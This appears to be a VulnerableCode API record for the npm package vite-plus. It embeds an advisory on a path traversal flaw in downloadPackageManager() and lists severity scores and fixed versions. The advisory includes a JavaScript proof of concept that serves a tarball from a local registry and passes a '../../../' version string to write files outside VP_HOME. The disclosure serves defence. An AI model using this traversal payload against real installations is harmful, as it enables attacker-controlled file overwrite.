Package Instance
Lookup for vulnerable packages by Package URL.
GET /api/packages/1035616?format=api
{ "url": "http://public2.vulnerablecode.io/api/packages/1035616?format=api", "purl": "pkg:npm/vite-plus@0.0.0-40918e094cfc5866505c7c99ca8187c4793b88f6", "type": "npm", "namespace": "", "name": "vite-plus", "version": "0.0.0-40918e094cfc5866505c7c99ca8187c4793b88f6", "qualifiers": {}, "subpath": "", "is_vulnerable": true, "next_non_vulnerable_version": "0.1.17", "latest_non_vulnerable_version": "0.1.17", "affected_by_vulnerabilities": [ { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89827?format=api", "vulnerability_id": "VCID-mkn3-k58k-pkhf", "summary": "Path traversal in vite-plus/binding downloadPackageManager() writes outside VP_HOME\n### Summary\n\n`downloadPackageManager()` in `vite-plus/binding` accepts an untrusted `version` string and uses it directly in filesystem paths. A caller can supply `../` segments to escape the `VP_HOME/package_manager/<pm>/` cache root and cause Vite+ to delete, replace, and populate directories outside the intended cache location.\n\n### Details\n\nThe public `vite-plus/binding` export `downloadPackageManager()` forwards `options.version` directly into the Rust package-manager download flow without validating that it is a normal semver version.\n\nThat value is used as a path component when building the install location under `VP_HOME`. After the package is downloaded and extracted, Vite+:\n\n1. computes the final target directory from the raw `version` string,\n2. removes any pre-existing directory at that target,\n3. renames the extracted package into that location, and\n4. writes executable shim files there.\n\nBecause the CLI validates versions via `semver::Version::parse()` before calling this code, the protection that exists for normal `vp create`, `vp migrate`, and `vp env` flows does not apply to direct callers of the binding. A programmatic caller of `vite-plus/binding` can pass traversal strings such as `../../../escaped` and break out of `VP_HOME`.\n\n### PoC\n\n```js\nimport fs from \"node:fs\";\nimport http from \"node:http\";\nimport os from \"node:os\";\nimport path from \"node:path\";\nimport { downloadPackageManager } from \"vite-plus/binding\";\n\nconst tgz = Buffer.from(\n \"H4sIAH/B1GkC/+3NsQqDMBjE8W/uU4hTXUwU0/dJg0irTYLR9zftUnCWQvH/W+645aJ1ox16dX94FX181e6Z5GA6u3XdJ7N9at223/7em8YYI4WWH1jTYud8L+fkgk9h6uspDNcyjGV1EQAAAAAAAAAAAAAAAADAH9gAb+vJ9QAoAAA=\",\n \"base64\",\n);\n\nconst vpHome = fs.mkdtempSync(path.join(os.tmpdir(), \"vp-home-\"));\nconst version = \"../../../vite-plus-escape\";\nconst escapedRoot = path.resolve(vpHome, \"package_manager\", \"pnpm\", version);\nconst escapedInstallDir = path.join(escapedRoot, \"pnpm\");\n\nprocess.env.VP_HOME = vpHome;\n\nconst server = http.createServer((req, res) => {\n res.writeHead(200, { \"content-type\": \"application/octet-stream\" });\n res.end(tgz);\n});\n\nawait new Promise((resolve) => server.listen(0, \"127.0.0.1\", resolve));\nconst { port } = server.address();\nprocess.env.npm_config_registry = `http://127.0.0.1:${port}`;\n\nconst result = await downloadPackageManager({\n name: \"pnpm\",\n version,\n});\n\nserver.close();\n\nconsole.log(\"VP_HOME =\", vpHome);\nconsole.log(\"installDir =\", result.installDir);\nconsole.log(\"escaped =\", escapedInstallDir);\nconsole.log(\"shim exists =\", fs.existsSync(path.join(escapedInstallDir, \"bin\", \"pnpm\")));\n\n// installDir is outside VP_HOME, and <escaped>/pnpm/bin/pnpm is created\n```\n\n### Impact\n\nA caller that can influence `downloadPackageManager()` input can escape the Vite+ cache directory and make the process overwrite attacker-chosen directories outside `VP_HOME`. When combined with the supported custom-registry override (`npm_config_registry`), this becomes attacker-controlled file write outside the intended install root.\n\n### Mitigating factors\n\n- **Normal CLI usage is not affected.** All built-in CLI paths (`vp create`, `vp migrate`, `vp env`) validate the version string via `semver::Version::parse()` before it reaches `downloadPackageManager()`.\n- The vulnerability is only reachable by programmatic callers that import `vite-plus/binding` directly and pass an untrusted version string.\n- No known downstream consumers pass untrusted input to this function.\n- Exploitation requires the attacker to already be executing code in the same Node.js process.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41211", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25154", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25042", "published_at": "2026-06-08T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.251", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00088", "scoring_system": "epss", "scoring_elements": "0.25167", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41211" }, { "reference_url": "https://github.com/voidzero-dev/vite-plus", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/voidzero-dev/vite-plus" }, { "reference_url": "https://github.com/voidzero-dev/vite-plus/security/advisories/GHSA-33r3-4whc-44c2", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-23T12:32:13Z/" } ], "url": "https://github.com/voidzero-dev/vite-plus/security/advisories/GHSA-33r3-4whc-44c2" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41211", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41211" }, { "reference_url": "https://github.com/advisories/GHSA-33r3-4whc-44c2", "reference_id": "GHSA-33r3-4whc-44c2", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-33r3-4whc-44c2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/1035657?format=api", "purl": "pkg:npm/vite-plus@0.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-mkn3-k58k-pkhf" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/vite-plus@0.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/111039?format=api", "purl": "pkg:npm/vite-plus@0.1.17", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/vite-plus@0.1.17" } ], "aliases": [ "CVE-2026-41211", "GHSA-33r3-4whc-44c2" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-mkn3-k58k-pkhf" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/vite-plus@0.0.0-40918e094cfc5866505c7c99ca8187c4793b88f6" }